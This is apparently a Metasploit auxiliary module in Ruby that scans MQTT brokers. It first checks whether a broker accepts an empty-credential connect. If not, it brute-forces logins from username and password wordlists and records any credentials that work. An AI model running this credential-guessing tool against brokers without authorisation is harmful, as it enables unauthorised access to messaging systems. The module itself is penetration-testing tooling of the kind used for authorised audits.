GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/scanner/mqtt/connect.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'metasploit/framework/credential_collection'
require 'metasploit/framework/login_scanner/mqtt'
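class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::MQTT
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::AuthBrute

  def initialize
    super(
      'Name' => 'MQTT Authentication Scanner',
      'Description' => %q(
        This module attempts to authenticate to MQTT.
      ),
      'Author' =>
        [
          'Jon Hart <jon_hart[at]rapid7.com>'
        ],
      'References' =>
        [
          ['URL', 'http://docs.oasis-open.org/mqtt/mqtt/v3.1.1/os/mqtt-v3.1.1-os.html#_Table_3.1_-']
        ],
      'License' => MSF_LICENSE,
      'DefaultOptions' =>
        {
          'BLANK_PASSWORDS' => false,
          'USER_AS_PASS' => true,
          'USER_FILE' => 'data/wordlists/unix_users.txt',
          'PASS_FILE' => 'data/wordlists/unix_passwords.txt'
        }
    )
  end

  # Performs a single MQTT CONNECT against the target with the supplied
  # credentials and reports whether the broker accepted it.
  #
  # @param username [String] username placed in the CONNECT packet
  # @param password [String] password placed in the CONNECT packet
  # @return [Boolean] true when the CONNACK return code is 0 (accepted)
  def test_login(username, password)
    client_opts = {
      username: username,
      password: password,
      # read_timeout / client_id come from the MQTT mixin (not visible here)
      read_timeout: read_timeout,
      client_id: client_id
    }
    connect
    client = Rex::Proto::MQTT::Client.new(sock, client_opts)
    connect_res = client.connect
    client.disconnect
    connect_res.return_code.zero?
  ensure
    # client.disconnect only sends the MQTT DISCONNECT packet; the TCP socket
    # opened by +connect+ is released here so every probe, including one that
    # raises mid-handshake, frees its connection instead of holding it until
    # module cleanup. The Tcp mixin's disconnect tolerates an unset socket.
    disconnect
  end

  # Probes the broker with empty credentials.
  #
  # NOTE(review): an empty username/password is sent rather than a CONNECT
  # with the username/password flags cleared; whether the client omits the
  # fields for '' depends on Rex::Proto::MQTT::Client -- confirm if brokers
  # that only allow truly anonymous connects are reported as "requires auth".
  #
  # @return [Boolean] true when the broker accepted the credential-less
  #   CONNECT, false otherwise. run_host relies on this value to decide
  #   whether a credential sweep is still needed.
  def default_login
    vprint_status("Testing without credentials")
    # Return an explicit boolean instead of the value of the +if+ expression
    # (i.e. whatever print_good returns), so that the caller's decision to
    # skip or run the brute-force sweep does not depend on the UI layer.
    return false unless test_login('', '')

    print_good("Does not require authentication")
    true
  end

  # Scanner entry point for one target: the credential sweep is only run
  # when the broker rejected the credential-less connect.
  #
  # @param _ip [String] target address (unused; RHOST is read by the mixins)
  def run_host(_ip)
    brute unless default_login
  end

  # Runs the credential sweep through the framework's MQTT login scanner and
  # records every result (valid or invalid) in the database.
  def brute
    vprint_status("Starting MQTT login sweep")
    cred_collection = build_credential_collection(
      username: datastore['USERNAME'],
      password: datastore['PASSWORD']
    )

    scanner = Metasploit::Framework::LoginScanner::MQTT.new(
      configure_login_scanner(
        host: rhost,
        port: rport,
        read_timeout: datastore['READ_TIMEOUT'],
        client_id: client_id,
        proxies: datastore['PROXIES'],
        cred_details: cred_collection,
        stop_on_success: datastore['STOP_ON_SUCCESS'],
        bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
        connection_timeout: datastore['ConnectTimeout'],
        max_send_size: datastore['TCP::max_send_size'],
        send_delay: datastore['TCP::send_delay'],
        framework: framework,
        framework_module: self,
        ssl: datastore['SSL'],
        ssl_version: datastore['SSLVersion'],
        ssl_verify_mode: datastore['SSLVerifyMode'],
        ssl_cipher: datastore['SSLCipher'],
        local_port: datastore['CPORT'],
        local_host: datastore['CHOST']
      )
    )

    scanner.scan! do |result|
      # Each result is persisted: successes become credential cores + logins,
      # failures are recorded via invalidate_login so they are not retried.
      credential_data = result.to_h
      credential_data.merge!(
        module_fullname: fullname,
        workspace_id: myworkspace_id
      )
      password = result.credential.private
      username = result.credential.public
      if result.success?
        credential_core = create_credential(credential_data)
        credential_data[:core] = credential_core
        create_credential_login(credential_data)
        print_good("MQTT Login Successful: #{username}/#{password}")
      else
        invalidate_login(credential_data)
        vprint_error("MQTT LOGIN FAILED: #{username}/#{password} (#{result.proof})")
      end
    end
  end
end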